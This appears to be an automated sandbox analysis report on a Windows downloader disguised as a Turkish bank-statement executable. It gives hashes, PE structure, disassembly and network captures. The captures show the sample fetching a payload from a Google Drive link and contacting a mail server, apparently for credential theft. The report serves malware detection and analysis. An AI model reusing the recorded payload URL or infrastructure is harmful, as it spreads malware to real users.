                                                                        rO27azgdXP.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        8FjZ4i5ZYi.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        waffle_lol.xlsGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        e1RA3RFD7Q.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        f1iHAqCbBt.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        NEW AIR COURIER.htmlGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        Q5yOweGeTg.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        Unreal.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        EITyS0c1l1.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        fTset285bI.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        ejecutable.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        gmT455QDI6.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        IdI36XfAJc.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174
                                                                        CYqow0VzsU.exeGet hashmaliciousBrowse
                                                                        • 216.58.212.161
                                                                        • 216.58.212.174

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        \Device\ConDrv
                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):30
                                                                        Entropy (8bit):3.964735178725505
                                                                        Encrypted:false
                                                                        SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                        MD5:9F754B47B351EF0FC32527B541420595
                                                                        SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                        SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                        SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview: NordVPN directory not found!..

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):5.7538699249737375
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:Hesap Hareketleri 28-09-2021.exe
                                                                        File size:90112
                                                                        MD5:2fca7a3e51417ee2e8aefafede0847d9
                                                                        SHA1:931518250bed6cd21b6cab529ed3ad9ead83cdcf
                                                                        SHA256:bffbffc2b1be154742fb81ecea14cb779b8fd81581ffce2855cf588f21a8020f
                                                                        SHA512:4d56a20cc61aa096fbd1e181ce72a79d237d90b7e20078fed0e3c767dfead51a5b1d150307ca911fbaffac206ef3679c99e9dc93dd37b3f5f419a55bb683220a
                                                                        SSDEEP:1536:tM0wFjVxFXrMGm0tEM5eoz/s74HEgKhs:tM0wFjV7XrXltPXs7SJgs
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L...A6.L.................0... ...............@....@........

                                                                        File Icon

                                                                        Icon Hash:821ca88c8e8c8c00

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4012c8
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x4C923641 [Thu Sep 16 15:22:41 2010 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:e73b8c032c82c64991ebe487a7ffcd43

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        push 0040FF80h
                                                                        call 00007F8334B32B73h
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        xor byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        inc eax
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [ebx+edx*2], ch
                                                                        and dword ptr [edx], esp
                                                                        std
                                                                        sbb eax, 52944436h
                                                                        push esp
                                                                        sbb byte ptr [esi], al
                                                                        sar dword ptr [eax+00000000h], 1
                                                                        add byte ptr [eax], al
                                                                        add dword ptr [eax], eax
                                                                        add byte ptr [eax], al
                                                                        inc edx
                                                                        add byte ptr [esi], al
                                                                        push eax
                                                                        add dword ptr [ecx], 73h
                                                                        popad
                                                                        jc 00007F8334B32BE5h
                                                                        push 73676E69h
                                                                        add byte ptr [eax], al
                                                                        sbb al, 29h
                                                                        sbb al, 03h
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        dec esp
                                                                        xor dword ptr [eax], eax
                                                                        cmp byte ptr [edx+ecx*8-66h], ch
                                                                        outsd
                                                                        adc eax, A74A902Eh
                                                                        mov bl, D9h
                                                                        dec esi
                                                                        pop ebp
                                                                        push esi
                                                                        dec esp
                                                                        stosd
                                                                        mov dword ptr [76B9991Fh], eax
                                                                        xor eax, 74B8462Ah
                                                                        add ch, ah
                                                                        call 00007F82E20265F2h
                                                                        xor ebx, dword ptr [ecx-48EE309Ah]
                                                                        or al, 00h
                                                                        stosb
                                                                        add byte ptr [eax-2Dh], ah
                                                                        xchg eax, ebx
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        push cs
                                                                        jmp far 0000h : 01A90000h
                                                                        add byte ptr [eax+eax], cl
                                                                        dec eax
                                                                        jc 00007F8334B32BF6h
                                                                        imul esp, dword ptr [ecx+62h], 65h
                                                                        jc 00007F8334B32BF0h
                                                                        xor dword ptr [eax], eax
                                                                        or eax, 50001201h
                                                                        outsd

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x136840x28.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x150000x540.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000xe8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x12aec0x13000False0.519377055921data6.24667059185IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .data0x140000xcf40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x150000x5400x1000False0.1298828125data1.4104134768IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_ICON0x154180x128GLS_BINARY_LSB_FIRST
                                                                        RT_GROUP_ICON0x154040x14data
                                                                        RT_VERSION0x150f00x314dataChineseTaiwan

                                                                        Imports

                                                                        DLLImport
                                                                        MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaAryConstruct2, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaStrToAnsi, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                                        Version Infos

                                                                        DescriptionData
                                                                        Translation0x0404 0x04b0
                                                                        LegalCopyrightChatSwipe
                                                                        InternalNameTOBENET
                                                                        FileVersion4.04.0001
                                                                        CompanyNameChatSwipe
                                                                        LegalTrademarksChatSwipe
                                                                        CommentsChatSwipe
                                                                        ProductNameChatSwipe
                                                                        ProductVersion4.04.0001
                                                                        FileDescriptionChatSwipe
                                                                        OriginalFilenameTOBENET.exe

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        ChineseTaiwan

                                                                        Network Behavior

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Sep 28, 2021 08:15:56.234982014 CEST49797443192.168.11.20216.58.212.174
                                                                        Sep 28, 2021 08:15:56.235074043 CEST44349797216.58.212.174192.168.11.20
                                                                        Sep 28, 2021 08:15:56.235260963 CEST49797443192.168.11.20216.58.212.174
                                                                        Sep 28, 2021 08:15:56.251553059 CEST49797443192.168.11.20216.58.212.174
                                                                        Sep 28, 2021 08:15:56.251605034 CEST44349797216.58.212.174192.168.11.20
                                                                        Sep 28, 2021 08:15:56.303407907 CEST44349797216.58.212.174192.168.11.20
                                                                        Sep 28, 2021 08:15:56.303591013 CEST49797443192.168.11.20216.58.212.174
                                                                        Sep 28, 2021 08:15:56.304996967 CEST44349797216.58.212.174192.168.11.20
                                                                        Sep 28, 2021 08:15:56.305214882 CEST49797443192.168.11.20216.58.212.174
                                                                        Sep 28, 2021 08:15:56.429861069 CEST49797443192.168.11.20216.58.212.174
                                                                        Sep 28, 2021 08:15:56.429905891 CEST44349797216.58.212.174192.168.11.20
                                                                        Sep 28, 2021 08:15:56.430572987 CEST44349797216.58.212.174192.168.11.20
                                                                        Sep 28, 2021 08:15:56.430705070 CEST49797443192.168.11.20216.58.212.174
                                                                        Sep 28, 2021 08:15:56.433109045 CEST49797443192.168.11.20216.58.212.174
                                                                        Sep 28, 2021 08:15:56.474016905 CEST44349797216.58.212.174192.168.11.20
                                                                        Sep 28, 2021 08:15:56.934151888 CEST44349797216.58.212.174192.168.11.20
                                                                        Sep 28, 2021 08:15:56.934314013 CEST49797443192.168.11.20216.58.212.174
                                                                        Sep 28, 2021 08:15:56.934348106 CEST44349797216.58.212.174192.168.11.20
                                                                        Sep 28, 2021 08:15:56.934457064 CEST49797443192.168.11.20216.58.212.174
                                                                        Sep 28, 2021 08:15:56.934525967 CEST44349797216.58.212.174192.168.11.20
                                                                        Sep 28, 2021 08:15:56.934736013 CEST49797443192.168.11.20216.58.212.174
                                                                        Sep 28, 2021 08:15:56.934762955 CEST44349797216.58.212.174192.168.11.20
                                                                        Sep 28, 2021 08:15:56.935077906 CEST49797443192.168.11.20216.58.212.174
                                                                        Sep 28, 2021 08:15:56.938920021 CEST49797443192.168.11.20216.58.212.174
                                                                        Sep 28, 2021 08:15:56.939004898 CEST44349797216.58.212.174192.168.11.20
                                                                        Sep 28, 2021 08:15:57.033303976 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.033381939 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.033571959 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.034044981 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.034097910 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.086338997 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.086477041 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.086524010 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.086549044 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.088033915 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.088308096 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.094507933 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.094522953 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.094811916 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.095072985 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.095326900 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.137881041 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.321997881 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.322299004 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.322566032 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.322804928 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.323122025 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.323354006 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.324476957 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.324748039 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.324764013 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.324815989 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.324964046 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.324997902 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.325193882 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.325350046 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.325383902 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.325577021 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.331688881 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.331870079 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.331902027 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.332039118 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.332078934 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.332109928 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.332237005 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.332272053 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.332695961 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.332904100 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.332948923 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.333188057 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.333410978 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.333611012 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.333656073 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.333849907 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.334111929 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.334326982 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.334372044 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.334564924 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.334779978 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.334986925 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.335031986 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.335232019 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.335450888 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.335692883 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.335737944 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.335937023 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.336163998 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.336364031 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.336409092 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.336630106 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.336849928 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.337053061 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.337099075 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.337296963 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.337517977 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.337671995 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.337701082 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.337903976 CEST49798443192.168.11.20216.58.212.161
                                                                        Sep 28, 2021 08:15:57.337949038 CEST44349798216.58.212.161192.168.11.20
                                                                        Sep 28, 2021 08:15:57.338191986 CEST49798443192.168.11.20216.58.212.161

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Sep 28, 2021 08:15:07.770737886 CEST5806153192.168.11.201.1.1.1
                                                                        Sep 28, 2021 08:15:07.779905081 CEST53580611.1.1.1192.168.11.20
                                                                        Sep 28, 2021 08:15:07.908737898 CEST5543153192.168.11.201.1.1.1
                                                                        Sep 28, 2021 08:15:07.917649031 CEST53554311.1.1.1192.168.11.20
                                                                        Sep 28, 2021 08:15:51.937340975 CEST5855153192.168.11.201.1.1.1
                                                                        Sep 28, 2021 08:15:51.946048021 CEST53585511.1.1.1192.168.11.20
                                                                        Sep 28, 2021 08:15:56.212064028 CEST6344953192.168.11.201.1.1.1
                                                                        Sep 28, 2021 08:15:56.220660925 CEST53634491.1.1.1192.168.11.20
                                                                        Sep 28, 2021 08:15:57.003176928 CEST5647553192.168.11.201.1.1.1
                                                                        Sep 28, 2021 08:15:57.031281948 CEST53564751.1.1.1192.168.11.20
                                                                        Sep 28, 2021 08:15:59.067965984 CEST5740953192.168.11.201.1.1.1
                                                                        Sep 28, 2021 08:15:59.076351881 CEST53574091.1.1.1192.168.11.20
                                                                        Sep 28, 2021 08:17:32.461437941 CEST6059553192.168.11.201.1.1.1
                                                                        Sep 28, 2021 08:17:32.523644924 CEST53605951.1.1.1192.168.11.20
                                                                        Sep 28, 2021 08:20:58.769433975 CEST6263453192.168.11.201.1.1.1
                                                                        Sep 28, 2021 08:20:58.777914047 CEST53626341.1.1.1192.168.11.20
                                                                        Sep 28, 2021 08:22:08.164103031 CEST5613853192.168.11.201.1.1.1
                                                                        Sep 28, 2021 08:22:08.172476053 CEST53561381.1.1.1192.168.11.20

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Sep 28, 2021 08:15:56.212064028 CEST192.168.11.201.1.1.10xde8dStandard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                        Sep 28, 2021 08:15:57.003176928 CEST192.168.11.201.1.1.10xbbc0Standard query (0)doc-0o-50-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                        Sep 28, 2021 08:17:32.461437941 CEST192.168.11.201.1.1.10x173fStandard query (0)mail.brimaq.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Sep 28, 2021 08:15:56.220660925 CEST1.1.1.1192.168.11.200xde8dNo error (0)drive.google.com216.58.212.174A (IP address)IN (0x0001)
                                                                        Sep 28, 2021 08:15:57.031281948 CEST1.1.1.1192.168.11.200xbbc0No error (0)doc-0o-50-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                        Sep 28, 2021 08:15:57.031281948 CEST1.1.1.1192.168.11.200xbbc0No error (0)googlehosted.l.googleusercontent.com216.58.212.161A (IP address)IN (0x0001)
                                                                        Sep 28, 2021 08:17:32.523644924 CEST1.1.1.1192.168.11.200x173fNo error (0)mail.brimaq.com78.128.8.31A (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • drive.google.com
                                                                        • doc-0o-50-docs.googleusercontent.com

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.11.2049797216.58.212.174443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2021-09-28 06:15:56 UTC0OUTGET /uc?export=download&id=1R606ThBbUXrI8jJ5HXdyvI0FaWypamM9 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        2021-09-28 06:15:56 UTC0INHTTP/1.1 302 Moved Temporarily
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Tue, 28 Sep 2021 06:15:56 GMT
                                                                        Location: https://doc-0o-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubgela7liasrjha8jdur2ta6pltlarcg/1632809700000/00519186742208262786/*/1R606ThBbUXrI8jJ5HXdyvI0FaWypamM9?e=download
                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                        Content-Security-Policy: script-src 'nonce-x4y2zx3UVNQMbKNqnb4D2A' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-XSS-Protection: 1; mode=block
                                                                        Server: GSE
                                                                        Set-Cookie: NID=511=Otui5-S2TBU7jgRE78hZz9E5z_yH2wxEVxBAO_-hJu0VzYSSOw0f-lilB41bRv6wBuamBfdyZU3JIZCeRoorrL4VywhIyBa8iE2SwAGygTD7ZSTFNpZefneFw-_PdFOzlRUMFu6o9KP0sISwekJxKqHBZnI7ylOrutae-R8jtjc; expires=Wed, 30-Mar-2022 06:15:56 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                        Accept-Ranges: none
                                                                        Vary: Accept-Encoding
                                                                        Connection: close
                                                                        Transfer-Encoding: chunked
                                                                        2021-09-28 06:15:56 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 6f 2d 35 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 75 62 67 65
                                                                        Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0o-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubge
                                                                        2021-09-28 06:15:56 UTC1INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.11.2049798216.58.212.161443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2021-09-28 06:15:57 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubgela7liasrjha8jdur2ta6pltlarcg/1632809700000/00519186742208262786/*/1R606ThBbUXrI8jJ5HXdyvI0FaWypamM9?e=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                        Cache-Control: no-cache
                                                                        Host: doc-0o-50-docs.googleusercontent.com
                                                                        Connection: Keep-Alive
                                                                        2021-09-28 06:15:57 UTC2INHTTP/1.1 200 OK
                                                                        X-GUploader-UploadID: ADPycdsa8JcjYCgUwb2QjSx_7pw3LcKHyesBE6cPYqjWb2RHII7SxClPtSzkYyEICJgRdbLDGPUrLlrJoNIjHSq8g8NqEZBLmg
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Credentials: false
